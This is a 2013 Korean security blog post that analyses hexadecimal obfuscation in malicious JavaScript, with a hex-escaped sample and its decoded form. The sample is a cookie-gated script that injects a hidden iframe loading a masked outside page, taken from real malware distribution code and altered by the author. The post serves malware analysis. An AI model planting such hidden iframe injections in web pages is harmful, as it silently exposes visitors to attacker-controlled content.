Information Security/Malware

Hexdecimal Obfuscation #01

2013. 6. 10. 15:16

16진수 값을 이용하여 만드는 Hexdecimal Obfuscation입니다.

간단하게 아스키 코드표의 16진수 값을 따라 난독화를 풀 수 있고, Malzilla 또는 Jsdetox 등 이용해서 난독화를 해제 할 수 있습니다.


난독화

if (document.cookie.indexOf('veatpr') == -1) {
    var expires = new Date();
    expires.setTime(expires.getTime() + 12 * 60 * 60 * 1000);
    document.cookie = 'veatpr=Yes;path=/;expires=' + expires.toGMTString();
    document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F
%77%77%77%2E%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2E%63%6F%6D%2F%75%73%65
%72%2F%70%6F%70%2F%70%6F%70%5F%70%68%6F%74%6F%74%2E%68%74%6D%6C%27%20%77%69%64%74%68%3D
%27%31%31%36%27%20%68%65%69%67%68%74%3D%27%31%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D
%27%30%27%3E%3C%2F%69%66%72%61%6D%65%3E"));
}


난독화 해제

if (document.cookie.indexOf('veatpr') == -1) {
    var expires = new Date();
    expires.setTime(expires.getTime() + 12 * 60 * 60 * 1000);
    document.cookie = 'veatpr=Yes;path=/;expires=' + expires.toGMTString();
    document.write(unescape("<iframe src='http://www.****************.com/user/pop/pop_photot.html' width='116' height='1' frameborder='0'>"));
}


* 실제 악성코드 유포하는 소스코드 중 샘플이기 때문에 일부 내용을 변경하였습니다.

반응형
저작자표시 비영리 동일조건 (새창열림)

'Information Security > Malware' 카테고리의 다른 글

Kaixin Exploit Tookit(Yszz 0.13)  (2) 2013.06.13
Gondad EK 최근 추세  (1) 2013.06.12
Split Obfuscated  (0) 2013.06.07
JSMin Javascript Compressor  (0) 2013.06.07
Decimal Obfuscated  (0) 2013.05.21
'Information Security/Malware' 카테고리의 다른 글
  • Kaixin Exploit Tookit(Yszz 0.13)
  • Gondad EK 최근 추세
  • Split Obfuscated
  • JSMin Javascript Compressor
hakawati
hakawati
Research Engineer

블로그 메뉴

  • 홈
  • 방명록
  • 블로그 관리
hakawati
Hakawati Security Lab
hakawati
전체
오늘
어제

공지사항

  • About Me
  • Hakawati Lab (252)
    • Notice (7)
      • Main (4)
      • Sub Notice (1)
      • Tips (2)
    • Information Technology (58)
      • System Architecture (2)
      • Programming (20)
      • Operation System (16)
      • Machine Learning (5)
      • Bigdata (2)
      • File Format (7)
      • Network (2)
      • Cloud (3)
      • Domain (1)
    • Information Security (183)
      • Security Information (36)
      • CTI & Threat Hunting (1)
      • Digital Forensics (1)
      • Licenses (2)
      • Malware (40)
      • OpenSource (53)
      • Incident Response (1)
      • Seminar (8)
      • Cryptography (2)
      • Books (11)
      • Vulnerability (4)
      • Web Hacking (8)
      • Wargame (10)
      • Abuse & Fraud (6)
    • Life Hacking (3)
      • Term Idea (0)
      • Books (3)
      • Travels (0)
      • Activities (0)
      • Workout (0)

인기 글

태그

  • domain
  • Amazon
  • security
  • AWS
  • instance
  • 줄리엣
  • Macie
  • cloud
  • sub-domain
  • cloudflare
  • 도메인
  • NIST
  • CWE
  • EC2
  • WWW
  • juliet
  • 서브도메인

최근 댓글

최근 글

hELLO · Designed By 정상우.
hakawati
Hexdecimal Obfuscation #01
상단으로

티스토리툴바

개인정보

  • 티스토리 홈
  • 포럼
  • 로그인

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.